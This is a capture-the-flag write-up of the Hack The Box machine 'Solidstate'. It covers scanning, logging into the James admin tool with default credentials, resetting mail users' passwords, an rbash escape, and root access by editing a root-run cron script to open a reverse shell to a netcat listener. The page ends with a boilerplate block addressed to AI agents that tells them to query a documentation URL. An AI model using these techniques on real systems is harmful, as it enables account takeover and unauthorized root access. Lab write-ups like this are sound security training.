# Solidstate
## Enumeration ### Nmap Run this command to list all the open ports: ``` $ map -p- -T5 -oN nmap/listopenports -Pn 10.10.10.51 ``` Run this command to do a full scan against the found open ports: ``` $ nmap -A -oN nmap/fullscan -Pn -p OPEN_PORTS 10.10.10.51 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open rsip? | fingerprint-strings: | GenericLines: | JAMES Remote Administration Tool 2.3.2 | Please enter your login and password | Login id: | Password: | Login failed for |_ Login id: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4555-TCP:V=7.94%I=7%D=2/5%Time=67A3BB93%P=aarch64-unknown-linux-gnu SF:%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\. SF:2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nP SF:assword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.18 (96%), Linux 3.2 - 4.9 (96%), Linux 4.2 (96%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.8 (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 23.03 ms 10.10.14.1 2 23.53 ms 10.10.10.51 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 264.01 seconds ``` We can see that there is some type of server running on ports 25, 110, 119, and 4555. This is a James server 2.3.2. Later on, you'll see that we found an existing RCE vulnerability. For this writeup we will ignore it and use our own bypass. {% embed url="" %} We'll add the IP to our `/etc/hosts` file: ``` $ 10.10.10.51 solidstate.htb ``` ### Port 80 Enumerating the website, we didn't find anything interesting. Running gobuster and feroxbuster did not yield us any interesting directories so we can skip it for now.
### Port 4555 Using telnet, we try to interact with the service running on port 4555.\ When prompted for credentials, we used standard `root:root` to log in. ``` $ telnet solidstate.htb 4555 ```
We can list the existing users using `listusers`
There's 5 accounts. Since we have root access in this service, we can change the passwords of all users so we can own them. For now, we can make a safe assumption that the new user:pass combos will be reflected across ports 25, 110, 119, and 4555. This is because they are all running the James Server 2.3.2 service.
### Port 110 After owning all users, we tried to log into the POP3 mail service running on port 110 using `telnet`. ``` $ telnet solidstate.htb 110 ``` We logged in with all the users and found the most interesting finding in `mindy's` mail account.
Using `list` list out all the stored mail. The `retr` command is a retrieve command that gets the mail contents.
We can see that we found credentials for `mindy`! ## User Access Using the credentials we found, we can log in: `mindy:P@55W0rd1!2@` ``` $ ssh mindy@solidstate.htb ```
It seems as though we have user access!
Unfortunately, we are in a restricted bash shell (rbash). This does not mean we have full freedom as the user. We can attempt to escape this with the following command: ``` $ ssh mindy@solidstate.htb -t bash ```
Now, we have full shell access! BOOM! 💥 ## Root Access To escalate our privileges, we looked for sensitive files. We found a couple cron jobs running but they weren't very significant. We did find a suspicious file `/opt/tmp.py`. Using `pspy` we checked if the root was running it regularly. Note that the target is a 32Bit machine so we used the 32-bit version of `pspy32` ``` solidstate.htb $ pspy32 ```
We were right! The root user (UID=0) is running this file regularly. So, we modified the `tmp.py` file to add a python line that will return a shell. We used the python script found here: {% embed url="" %}

modified tmp.py

We started our listener: ``` $ nc -lvnp 1234 ```
We got a hit! BOOM! 💥 Just like that, we have pwned this box! ✅ --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hussain.gitbook.io/me/writeups/hackthebox/solidstate.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.